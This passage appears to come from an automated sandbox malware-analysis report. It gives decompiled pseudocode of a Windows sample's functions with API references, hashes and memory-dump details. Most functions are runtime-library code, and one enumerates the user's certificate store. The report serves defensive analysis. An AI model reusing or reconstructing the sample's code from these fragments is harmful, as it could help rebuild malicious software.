									_push(_v48);
									_t508 = _t506 + 4 - 0x10;
									_v172 = _t508;
									_v284 = E00417A60(_t508, __eflags,  &_v40);
									E00415920(_v252, _t494, _t497);
									E00413490( *((intOrPtr*)(_v252 + 0xfc)), _v48, __eflags, _v48, _v24, _v20);
									_v176 = _v48;
									_push(_v176);
									E00422D00();
									_t506 = _t508 + 4;
								} else {
									__eflags = _v24;
									if(__eflags > 0) {
										goto L18;
									}
								}
								E00417F80( &_v40, __eflags);
								_v288 = E00413250( *((intOrPtr*)(_v252 + 0xfc)), _v252, __eflags,  &_v192,  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xf4)) + 0x30)),  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xf4)) + 0x34)));
								_v292 = _v288;
								_v8 = 4;
								E00417BC0( &_v40, _v292);
								_v8 = 0;
								E00417D00( &_v192);
								_t301 = E00417E20( &_v40);
								_t498 =  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xfc)) + 4));
								_v24 = E00423BC0(_t301, 0,  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xfc)))),  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xfc)) + 4)));
								_v20 = 0;
								__eflags = _v20;
								if(__eflags > 0) {
									L21:
									_push(_v24);
									_v196 = E0040E131(_v24, _t494, _t498, __eflags);
									_v48 = _v196;
									_push(_v20);
									_push(_v24);
									_push(_v48);
									_t510 = _t506 + 4 - 0x10;
									_v200 = _t510;
									_v296 = E00417A60(_t510, __eflags,  &_v40);
									E00415920(_v252, _t494, _t498);
									E00413490( *((intOrPtr*)(_v252 + 0x100)), _v48, __eflags, _v48, _v24, _v20);
									_v204 = _v48;
									_push(_v204);
									E00422D00();
									_t506 = _t510 + 4;
								} else {
									__eflags = _v24;
									if(__eflags > 0) {
										goto L21;
									}
								}
								E00417F80( &_v40, __eflags);
								_v300 = E00413250( *((intOrPtr*)(_v252 + 0xfc)), _v252, __eflags,  &_v220,  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xf4)) + 0x20)),  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xf4)) + 0x24)));
								_v304 = _v300;
								_v8 = 5;
								E00417BC0( &_v40, _v304);
								_v8 = 0;
								E00417D00( &_v220);
								_v24 = E00423BC0(E00417E20( &_v40), 0,  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xfc)))),  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xfc)) + 4)));
								_v20 = 0;
								_push(_v24);
								_v224 = E0040E131(_v24, _t494,  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xfc)) + 4)), __eflags);
								_v48 = _v224;
								_push(_v20);
								_push(_v24);
								_push(_v48);
								_v228 = _t506 + 4 - 0x10;
								_v308 = E00417A60(_t506 + 4 - 0x10, __eflags,  &_v40);
								E00415920(_v252, _t494,  *((intOrPtr*)( *((intOrPtr*)(_v252 + 0xfc)) + 4)));
								E00414220( *((intOrPtr*)(_v252 + 0xf8)), __eflags, _v48, _v24, _v20);
								_v44 = E00413060(_v48 + 0x74);
								_v232 = _v48;
								_push(_v232);
								E00422D00();
								_v312 = E00413250( *((intOrPtr*)(_v252 + 0xfc)), 0, __eflags,  &_v248, _v44, 0);
								_v316 = _v312;
								_v8 = 6;
								__eflags = _v252 + 0x104;
								E00417BC0(_v252 + 0x104, _v316);
								_v8 = 0;
								E00417D00( &_v248);
								_t437 = _v252;
								 *((intOrPtr*)(_t437 + 0xd8)) = 0;
								 *((intOrPtr*)(_t437 + 0xdc)) = 0;
								 *((char*)(_v252 + 0xe0)) = 1;
								_v8 = 0xffffffff;
								_t272 = E00417D00( &_v40);
							} else {
								goto L15;
							}
						}
					} else {
						_v8 = 0xffffffff;
						_t272 = E00417D00( &_v40);
					}
				} else {
					_v8 = 0xffffffff;
					_t272 = E00417D00( &_v40);
				}
				L23:
				 *[fs:0x0] = _v16;
				return _t272;
			}

0x00414c60
0x00414c63
0x00414c65
0x00414c70
0x00414c71
0x00414c78
0x00414c7e
0x00414c7f
0x00414c85
0x00414c8c
0x00414c93
0x00414c9d
0x00414ca2
0x00414ca9
0x00414caf
0x00414cb9
0x00414cc3
0x00414cc7
0x00414cc9
0x00414d35
0x00414d3a
0x00414d3d
0x00414d49
0x00414d4f
0x00414d59
0x00414d65
0x00414d68
0x00414d6d
0x00414d74
0x00414ccb
0x00414cdd
0x00414ce2
0x00414ce5
0x00414cf1
0x00414cf7
0x00414d10
0x00414d15
0x00414d1c
0x00414d1c
0x00414d85
0x00414d99
0x00414dbe
0x00414dda
0x00414ddf
0x00414de5
0x00414deb
0x00414df1
0x00414dfe
0x00414e0a
0x00414e0d
0x00414e12
0x00414e1c
0x00414e2a
0x00414e43
0x00414e52
0x00414e6a
0x00414e72
0x00414e7e
0x00414e7f
0x00414e84
0x00414e87
0x00414e8d
0x00414e97
0x00414ea1
0x00414eb3
0x00414eb3
0x00414eb7
0x00000000
0x00000000
0x00414ebf
0x00414ec5
0x00414ecf
0x00414ed6
0x00414ed8
0x00414ead
0x00414ead
0x00414eb0
0x00000000
0x00414eda
0x00414eda
0x00414ee4
0x00414ee4
0x00000000
0x00414ed8
0x00414ef0
0x00414ef6
0x00414f00
0x00414f16
0x00414f1e
0x00414f20
0x00414f42
0x00414f48
0x00414f4e
0x00414f55
0x00414f63
0x00414f63
0x00414f6d
0x00414f57
0x00414f57
0x00414f5d
0x00414f61
0x00414f8d
0x00414f98
0x00414f9e
0x00414fa0
0x00414fb9
0x00414fc4
0x00414fca
0x00414fcc
0x00414fe3
0x00414fef
0x00414ff5
0x00415003
0x00415008
0x00415012
0x0041501a
0x0041502d
0x0041503b
0x0041503e
0x00415041
0x00415045
0x00415051
0x00415054
0x0041505d
0x00415069
0x0041506f
0x00415073
0x00415077
0x00415078
0x0041507d
0x0041508c
0x00415098
0x004150b5
0x004150bd
0x004150c9
0x004150ca
0x004150cf
0x00415047
0x00415047
0x0041504b
0x00000000
0x00000000
0x0041504b
0x004150d5
0x00415106
0x00415112
0x00415118
0x00415126
0x0041512b
0x00415135
0x0041513d
0x00415150
0x0041515e
0x00415161
0x00415164
0x00415168
0x00415174
0x00415177
0x00415180
0x0041518c
0x00415192
0x00415196
0x0041519a
0x0041519b
0x004151a0
0x004151af
0x004151bb
0x004151d8
0x004151e0
0x004151ec
0x004151ed
0x004151f2
0x0041516a
0x0041516a
0x0041516e
0x00000000
0x00000000
0x0041516e
0x004151f8
0x00415229
0x00415235
0x0041523b
0x00415249
0x0041524e
0x00415258
0x00415281
0x00415284
0x0041528a
0x00415293
0x0041529f
0x004152a5
0x004152a9
0x004152ad
0x004152b3
0x004152c2
0x004152ce
0x004152eb
0x004152ff
0x00415305
0x00415311
0x00415312
0x00415339
0x00415345
0x0041534b
0x0041535c
0x00415362
0x00415367
0x00415371
0x00415376
0x0041537c
0x00415386
0x00415396
0x0041539d
0x004153a7
0x00000000
0x00000000
0x00000000
0x00414f61
0x00414f22
0x00414f22
0x00414f2c
0x00414f2c
0x00414d9b
0x00414d9b
0x00414da5
0x00414da5
0x004153ac
0x004153af
0x004153ba

APIs

shared_ptr.LIBCMTD ref: 00415003
shared_ptr.LIBCMTD ref: 00415126
shared_ptr.LIBCMTD ref: 00415249
shared_ptr.LIBCMTD ref: 00415362

Strings

,LA, xrefs: 00414CC3

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: shared_ptr
String ID: ,LA
API String ID: 2025160788-2466322329
Opcode ID: 6151e7bca9145eb9b1d53b351cb6971f08e16287c0667658dda2db3dfa97bb88
Instruction ID: ce7af1c1f75452ff6f67c6d1ca3ba76c08004bab8ab2f70abde9d639bd50c851
Opcode Fuzzy Hash: 6151e7bca9145eb9b1d53b351cb6971f08e16287c0667658dda2db3dfa97bb88
Instruction Fuzzy Hash: 93223C70E00219DFDB24DB55C891BEEB7B5AF88304F1081EDE519AB281DB746E85CFA4

Uniqueness

Uniqueness Score: -1.00%

Function 00422C34 Relevance: 6.0, APIs: 4, Instructions: 41
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 82%

			E00422C34(void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4) {
				char* _v8;
				signed int _v20;
				long _v24;
				long _v36;
				void* _v40;
				void _v64;
				void* _t23;
				signed int _t24;
				signed int _t29;
				DWORD* _t30;
				signed int _t37;
				void* _t41;
				void* _t42;
				void* _t48;

				_t48 = __esi;
				_t42 = __edi;
				_t41 = __edx;
				while(1) {
					_t23 = E0042656D(_t41, _t42, _t48, _a4); // executed
					if(_t23 != 0) {
						break;
					}
					_t24 = E00427E12(_t23, _a4);
					__eflags = _t24;
					if(_t24 == 0) {
						__eflags =  *0x463800 & 0x00000001;
						if(( *0x463800 & 0x00000001) == 0) {
							 *0x463800 =  *0x463800 | 0x00000001;
							__eflags =  *0x463800;
							_push(1);
							_v8 = "bad allocation";
							E004222CC(0x4637f4,  &_v8);
							 *0x4637f4 = 0x451444;
							E00423735( *0x463800, 0x45077f);
						}
						E00422400( &_v20, 0x4637f4);
						_push(0x459510);
						_push( &_v20);
						_v20 = 0x451444;
						L7();
						asm("int3");
						_push(0x451444);
						_push(0x4637f4);
						_t37 = 8;
						_v40 = memcpy( &_v64, 0x4529bc, _t37 << 2);
						_t29 = _v20;
						_v36 = _t29;
						__eflags = _t29;
						if(_t29 != 0) {
							__eflags =  *_t29 & 0x00000008;
							if(( *_t29 & 0x00000008) != 0) {
								_v20 = 0x1994000;
							}
						}
						_t30 =  &_v20;
						RaiseException(_v40, _v36, _v24, _t30);
						return _t30;
					} else {
						continue;
					}
					L11:
				}
				return _t23;
				goto L11;
			}

0x00422c34
0x00422c34
0x00422c34
0x00422c4b
0x00422c4e
0x00422c56
0x00000000
0x00000000
0x00422c41
0x00422c47
0x00422c49
0x00422c5a
0x00422c6b
0x00422c6d
0x00422c6d
0x00422c74
0x00422c7c
0x00422c83
0x00422c8d
0x00422c93
0x00422c98
0x00422c9d
0x00422ca2
0x00422caa
0x00422cab
0x00422cae
0x00422cb3
0x00422cbf
0x00422cc0
0x00422cc3
0x00422cce
0x00422cd1
0x00422cd5
0x00422cd9
0x00422cdb
0x00422cdd
0x00422ce0
0x00422ce2
0x00422ce2
0x00422ce0
0x00422ce9
0x00422cf6
0x00422cfd
0x00000000
0x00000000
0x00000000
0x00000000
0x00422c49
0x00422c59
0x00000000

APIs

_malloc.LIBCMT ref: 00422C4E

Part of subcall function 0042656D: __FF_MSGBANNER.LIBCMT ref: 00426586
Part of subcall function 0042656D: __NMSG_WRITE.LIBCMT ref: 0042658D
Part of subcall function 0042656D: RtlAllocateHeap.NTDLL(00000000,00000001,00000001,00000000,00000000,?,00425505,?,00000001,?,?,0042BD1F,00000018,0045C028,0000000C,0042BDAF), ref: 004265B2

std::exception::exception.LIBCMT ref: 00422C83
std::exception::exception.LIBCMT ref: 00422C9D
__CxxThrowException@8.LIBCMT ref: 00422CAE

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: std::exception::exception$AllocateException@8HeapThrow_malloc
String ID:
API String ID: 615853336-0
Opcode ID: a93882c4edeaa2652c1fe55326fb960240f37102fcd0cf3ff3226ef8a02714de
Instruction ID: 30891cc61be0de3aa5d9c1cfa84f04693a2490b602937a61a64b201cc0e9f4ca
Opcode Fuzzy Hash: a93882c4edeaa2652c1fe55326fb960240f37102fcd0cf3ff3226ef8a02714de
Instruction Fuzzy Hash: 1FF049B1700169B6CB14FF16EE02A9E7AA86B00319F90442FF80096192EBFC8B05C75E

Uniqueness

Uniqueness Score: -1.00%

Function 0041C060 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 87%

			E0041C060(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				intOrPtr _v32;
				intOrPtr _t33;
				void* _t34;
				void* _t45;
				void* _t49;
				void* _t50;
				intOrPtr _t51;
				void* _t55;

				_push(0xffffffff);
				_push(E0044EFDB);
				 *[fs:0x0] = _t51;
				_v28 = __ecx;
				_v24 = E00422C34(_t45, _t49, _t50, _t55, 0x20,  *[fs:0x0]);
				_v8 = 0;
				if(_v24 == 0) {
					_v32 = 0;
				} else {
					_t33 = E0041C130(_t34, _v24, _t49, _t50,  *_a4); // executed
					_v32 = _t33;
				}
				_v20 = _v32;
				_v8 = 0xffffffff;
				 *_v28 = _v20;
				if(_a8 != 0) {
					E0041C1E0( *_v28, _a8, E004011C0());
					if(E0041C210( *_v28, 0, 0) != 0xffffffff) {
						 *((intOrPtr*)( *_v28 + 0x10)) = 0;
						E0040DB14( *_v28 + 0x18,  *_v28, 0x451bd0);
					}
				}
				 *[fs:0x0] = _v16;
				return _v28;
			}

0x0041c063
0x0041c065
0x0041c071
0x0041c07b
0x0041c088
0x0041c08b
0x0041c096
0x0041c0ab
0x0041c098
0x0041c0a1
0x0041c0a6
0x0041c0a6
0x0041c0b5
0x0041c0b8
0x0041c0c5
0x0041c0cb
0x0041c0e1
0x0041c0f5
0x0041c0fc
0x0041c110
0x0041c110
0x0041c0f5
0x0041c11b
0x0041c125

APIs

Part of subcall function 00422C34: _malloc.LIBCMT ref: 00422C4E

std::locale::_Locimp::_Addfac.LIBCPMTD ref: 0041C0E1
_Yarn.LIBCPMT ref: 0041C110

Part of subcall function 0041C130: _Yarn.LIBCPMT ref: 0041C1A6
Part of subcall function 0041C130: std::locale::_Locimp::_Locimp_ctor.LIBCPMT ref: 0041C1B7

Strings

X5F, xrefs: 0041C0CD

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Locimp::_Yarnstd::locale::_$AddfacLocimp_ctor_malloc
String ID: X5F
API String ID: 777221983-2690678793
Opcode ID: 4ad681073a821ec7cf7071d731add66de1ef9c3b5865d7976206271cc49693db
Instruction ID: e207f33cb5ff947224484044b797a72dcab6cd4b2c058f146cd201ac05fa09f0
Opcode Fuzzy Hash: 4ad681073a821ec7cf7071d731add66de1ef9c3b5865d7976206271cc49693db
Instruction Fuzzy Hash: 5C216FB4E40209EFCB14DF99C882BAEBBB0FB48724F10421AE5156B3D1D7786940CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 00424555 Relevance: 4.5, APIs: 3, Instructions: 23
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 75%

			E00424555(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				intOrPtr _t10;
				intOrPtr _t12;
				void* _t22;

				_push(0xc);
				_push(0x45bbd8);
				E0042A1F0(__ebx, __edi, __esi);
				_t24 =  *((intOrPtr*)(_t22 + 8));
				if( *((intOrPtr*)(_t22 + 8)) != 0) {
					E004242ED( *((intOrPtr*)(_t22 + 8)));
					 *((intOrPtr*)(_t22 - 4)) = 0;
					_t10 = E00424433(__ebx, __edx, __edi,  *((intOrPtr*)(_t22 + 8))); // executed
					 *((intOrPtr*)(_t22 - 0x1c)) = _t10;
					 *((intOrPtr*)(_t22 - 4)) = 0xfffffffe;
					E0042459E();
					_t12 =  *((intOrPtr*)(_t22 - 0x1c));
				} else {
					_push(0);
					_t12 = E0042447B(__ebx, __edi, 0, _t24);
				}
				return E0042A235(_t12);
			}

0x00424555
0x00424557
0x0042455c
0x00424563
0x00424566
0x00424574
0x0042457a
0x00424580
0x00424586
0x00424589
0x00424590
0x00424595
0x00424568
0x00424568
0x00424569
0x0042456e
0x0042459d

APIs

_flsall.LIBCMT ref: 00424569

Part of subcall function 0042447B: __lock.LIBCMT ref: 00424491
Part of subcall function 0042447B: __fflush_nolock.LIBCMT ref: 004244E4
Part of subcall function 0042447B: __fflush_nolock.LIBCMT ref: 004244FF

__lock_file.LIBCMT ref: 00424574
__fflush_nolock.LIBCMT ref: 00424580

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: __fflush_nolock$__lock__lock_file_flsall
String ID:
API String ID: 3191677874-0
Opcode ID: f03c5f1d95608d9401a737af372aab4d76259ae350e08c87bf5d5bf718a2b8ae
Instruction ID: 9e41dfa7fd19de92ba8904697387ef73466aa8cb14a46ba0d9c4dab55a36e715
Opcode Fuzzy Hash: f03c5f1d95608d9401a737af372aab4d76259ae350e08c87bf5d5bf718a2b8ae
Instruction Fuzzy Hash: A6E06530A00234FBCB11BB65F80155D7F60DF84755BA0815BB45855191C77C47828ACD

Uniqueness

Uniqueness Score: -1.00%

Function 0040EF20 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 67%

			E0040EF20(void* __ebx, intOrPtr* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				signed int _v48;
				intOrPtr* _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _t42;
				void* _t55;
				void* _t59;
				void* _t79;
				void* _t84;
				intOrPtr _t85;
				void* _t87;
				intOrPtr _t88;

				_t83 = __edi;
				_t59 = __ebx;
				_push(0xffffffff);
				_push(E0044E56B);
				 *[fs:0x0] = _t85;
				_v52 = __ecx;
				_v48 = 0;
				E00410990(_v52 + 4, __eflags);
				_t42 = E00422C34(_t79, __edi, _t84, __eflags, 4,  *[fs:0x0]);
				_t87 = _t85 - 0x38 + 4;
				_v28 = _t42;
				_v8 = 0;
				if(_v28 == 0) {
					_v56 = 0;
				} else {
					_v56 = E00417060(_v28,  *_v52);
				}
				_v24 = _v56;
				_v8 = 0xffffffff;
				_v20 = _v24;
				E00417170(_v20, 0, 0); // executed
				if(E00417150(_v20) == 0) {
					_push(E0040E970);
					_t88 = _t87 - 0x1c;
					_v32 = _t88;
					_v60 = E00404860(_t88, "/");
					_push(_v20);
					E0040E7C0(_t59, _v52, _t83, __eflags);
				} else {
					_t55 = E00404150(0x464530, "Unable to open OLESS file");
					_t88 = _t87 + 8;
					E00401410(_t55, E004058A0);
				}
				E004171A0(_v20);
				_v40 = _v20;
				_v36 = _v40;
				_t94 = _v36;
				if(_v36 == 0) {
					_v64 = 0;
				} else {
					_v64 = E0040E790(_v36, 1);
				}
				_v44 = _t88 - 0x10;
				_v68 = E00410790(_t88 - 0x10, _t94, _v52 + 4);
				_push(_a4);
				_v72 = E00411CD0(_t94);
				_v48 = _v48 | 0x00000001;
				 *[fs:0x0] = _v16;
				return _a4;
			}

0x0040ef20
0x0040ef20
0x0040ef23
0x0040ef25
0x0040ef31
0x0040ef3b
0x0040ef3e
0x0040ef4b
0x0040ef52
0x0040ef57
0x0040ef5a
0x0040ef5d
0x0040ef68
0x0040ef7d
0x0040ef6a
0x0040ef78
0x0040ef78
0x0040ef87
0x0040ef8a
0x0040ef94
0x0040ef9e
0x0040efad
0x0040efcf
0x0040efd4
0x0040efd9
0x0040efe6
0x0040efec
0x0040eff0
0x0040efaf
0x0040efbe
0x0040efc3
0x0040efc8
0x0040efc8
0x0040eff8
0x0040f000
0x0040f006
0x0040f009
0x0040f00d
0x0040f01e
0x0040f00f
0x0040f019
0x0040f019
0x0040f030
0x0040f03b
0x0040f041
0x0040f04a
0x0040f053
0x0040f05c
0x0040f066

APIs

Part of subcall function 00422C34: _malloc.LIBCMT ref: 00422C4E

codecvt.LIBCPMTD ref: 0040F014

Part of subcall function 0040E7C0: shared_ptr.LIBCMTD ref: 0040E818

Strings

Unable to open OLESS file, xrefs: 0040EFB4

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: _malloccodecvtshared_ptr
String ID: Unable to open OLESS file
API String ID: 2802794906-1647946069
Opcode ID: 656cebcf2c1b643b21f447398ed0c14464d2ebe5e05f015a7f1008c521cee761
Instruction ID: 4f426f285f1598aff73c7b9ba72d25376f88f23dd5b3e3372e4981628fe2b249
Opcode Fuzzy Hash: 656cebcf2c1b643b21f447398ed0c14464d2ebe5e05f015a7f1008c521cee761
Instruction Fuzzy Hash: E2412BB0E10209ABDB04EFAAD852BAEBBB1BF48704F10452EF515773D1DB785940CB99

Uniqueness

Uniqueness Score: -1.00%

Function 0041C130 Relevance: 3.0, APIs: 2, Instructions: 50
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 68%

			E0041C130(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, intOrPtr _a4) {
				char _v8;
				intOrPtr _v16;
				intOrPtr* _v20;
				void* __ebp;
				intOrPtr _t56;

				_push(0xffffffff);
				_push(E0044F003);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t56;
				_push(__ecx);
				_v20 = __ecx;
				E00401270(_v20, 1);
				_v8 = 0;
				 *_v20 = 0x451bd8;
				 *((intOrPtr*)(_v20 + 8)) = 0;
				_t9 = _a4 + 0xc; // 0x89e4558b
				 *((intOrPtr*)(_v20 + 0xc)) =  *_t9;
				_t13 = _a4 + 0x10; // 0x45c7f055
				 *((intOrPtr*)(_v20 + 0x10)) =  *_t13;
				_t17 = _a4 + 0x14; // 0xfffffffc
				 *((char*)(_v20 + 0x14)) =  *_t17;
				E0040DBB9(_v20 + 0x18, E004013F0(_a4 + 0x18));
				_v8 = 1;
				_push(_a4);
				_push(_v20); // executed
				E00439F16(__ebx, _a4, __edi, __esi, _v20 + 0x18); // executed
				_v8 = 0xffffffff;
				 *[fs:0x0] = _v16;
				return _v20;
			}

0x0041c133
0x0041c135
0x0041c140
0x0041c141
0x0041c148
0x0041c149
0x0041c151
0x0041c156
0x0041c160
0x0041c169
0x0041c176
0x0041c179
0x0041c182
0x0041c185
0x0041c18e
0x0041c191
0x0041c1a6
0x0041c1ab
0x0041c1b2
0x0041c1b6
0x0041c1b7
0x0041c1bf
0x0041c1cc
0x0041c1d6

APIs

_Yarn.LIBCPMT ref: 0041C1A6

Part of subcall function 0040DBB9: _Yarn.LIBCPMT ref: 0040DBCB

std::locale::_Locimp::_Locimp_ctor.LIBCPMT ref: 0041C1B7

Part of subcall function 00439F16: __EH_prolog3.LIBCMT ref: 00439F1D
Part of subcall function 00439F16: std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00439F49

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: Locimp::_Yarnstd::locale::_$H_prolog3Locimp_ctorMakeloc
String ID:
API String ID: 2863748547-0
Opcode ID: f64e55e7f03d2ca1aa092884dd82ddea480cc42ef35bc181e5f1aa708a19bb38
Instruction ID: a97d23f008ccb70a09251f7daf39a8dfa2f462f54fc829860b328d43f902a4cd
Opcode Fuzzy Hash: f64e55e7f03d2ca1aa092884dd82ddea480cc42ef35bc181e5f1aa708a19bb38
Instruction Fuzzy Hash: C1112EB4A04259DFCB08CF89D850BAEBBB5FF49314F10865DF8256B392C775A940CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 0040A33A Relevance: 3.0, APIs: 2, Instructions: 31
encryptionwindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 15%

			E0040A33A(intOrPtr __edx) {
				intOrPtr _t7;
				intOrPtr _t11;
				intOrPtr _t19;
				intOrPtr _t20;
				signed int _t21;

				_t16 = __edx;
				if( *0x4631e4 == 0) {
					_t16 = ( *(_t21 - 0x38) >> 4) +  *0x4631f4;
					 *0x4631d8 = ( *(_t21 - 0x38) >> 4) +  *0x4631f4;
					_t7 =  *0x462f5c; // 0x4770000
					__imp__CertEnumPhysicalStore(L"MY", 0x10000, 0, _t7); // executed
				} else {
					SetStretchBltMode(0, 4);
				}
				 *((intOrPtr*)(_t21 - 4)) = 0xfffffffe;
				 *[fs:0x0] =  *((intOrPtr*)(_t21 - 0x10));
				_pop(_t19);
				_pop(_t20);
				_pop(_t11);
				return E004230EF(0, _t11,  *(_t21 + 0x778) ^ _t21, _t16, _t19, _t20);
			}

0x0040a33a
0x0040a344
0x0040a358
0x0040a35e
0x0040a364
0x0040a376
0x0040a346
0x0040a34a
0x0040a34a
0x0040a37c
0x0040a388
0x0040a390
0x0040a391
0x0040a392
0x0040a3a7

APIs

SetStretchBltMode.GDI32(00000000,00000004), ref: 0040A34A
CertEnumPhysicalStore.CRYPT32(00451998,00010000,00000000,04770000), ref: 0040A376

Memory Dump Source

Source File: 00000000.00000002.289784623.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.289780882.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289895062.0000000000451000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289910874.0000000000460000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.289915647.0000000000466000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_555.jbxd

Similarity

API ID: CertEnumModePhysicalStoreStretch
String ID:
API String ID: 1772324911-0
Opcode ID: a66d2fd7a5c19b8e5ae64e1047db2ffaf406dd6beb4d97e6f99c07096f10f17a
Instruction ID: d4a9cc64d7db71c90e9890c705861589708d0a409010cc913be999728e501183
Opcode Fuzzy Hash: a66d2fd7a5c19b8e5ae64e1047db2ffaf406dd6beb4d97e6f99c07096f10f17a
Instruction Fuzzy Hash: A5F09671644344DFD764CF58ED067DD77B0F748712F10413AEA0A962E0E7752A40CA0E

Uniqueness

Uniqueness Score: -1.00%

Function 0043BA46 Relevance: 3.0, APIs: 2, Instructions: 21
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0043BA46(void* __ecx, intOrPtr __edx, void* __eflags, char _a4) {
				signed int* _t9;
				intOrPtr _t15;

				_t15 = __edx;
				 *((intOrPtr*)(__ecx + 0xc)) = E0040D8E0();
				 *((intOrPtr*)(__ecx + 0x10)) = _t15;
				_t9 = E0043B929(_a4,  &_a4); // executed
				 *(__ecx + 8) =  *_t9;
				 *_t9 =  *_t9 & 0x00000000;
				return E00422BFA(_a4);
			}

0x0043ba46
0x0043ba56
